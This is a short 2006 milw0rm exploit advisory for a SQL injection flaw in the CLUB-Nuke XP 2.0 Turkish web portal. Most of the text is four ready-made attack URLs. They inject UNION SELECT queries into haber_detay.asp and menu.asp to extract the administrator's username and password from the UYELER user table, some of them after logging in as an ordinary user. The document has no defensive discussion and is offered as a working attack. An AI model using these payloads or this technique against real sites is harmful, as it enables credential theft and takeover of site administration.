1 # CLUB−Nuke [XP] v2.0 LCID 2048 (Turkish Version) SQL Injection Vulnerability
2 # Risk : High
3 # Credit : ASIANEAGLE
4 # Contact: admin@asianeagle.org
5 # Web : www.asianeagle.org
6 # Download Link : http://www.aspindir.com/Kategoriler/asp/portal−&−hazir−site/?P=7&K=&T=
7
8
9 #Exploit:
10 Note : User Logins Must Be Enabled By Admin To Exploit This Vulnerability
11
12 #Admin Nick: http://[SITE]/club−nuke path/haber_detay.asp?haber_id=−1%20union%20select%200,1,U_ADI,3,4,5,6%20from%20U
YELER%20where%20U_ID%20like%201
13
14 #Admin Password :http::[SITE]/club−nuke path/haber_detay.asp?haber_id=−1%20union%20select%200,1,U_SIFRE,3,4,5,6%20fro
m%20UYELER%20where%20U_ID%20like%201
15
16 after login as user;
17
18 #Admin Nick : http://[SITE]/club−nuke path/menu.asp?menu_id=−1%20union%20select%200,1,U_ADI,3,4,5%20from%20UYELER%
20where%20U_ID%20like%201
19
20 #Admin Password: http://[SITE]/club−nuke path/menu.asp?menu_id=−1%20union%20select%200,1,U_SIFRE,3,4,5%20from%20UYELE
R%20where%20U_ID%20like%201
21
22 #Forever milw0rm ;)
23
24 # milw0rm.com [2006−08−08]
Page 1/1
CLUBNuke XP 2.0 LCID 2048 Turkish Version SQL Injection
ASIANEAGLE
08/08/2006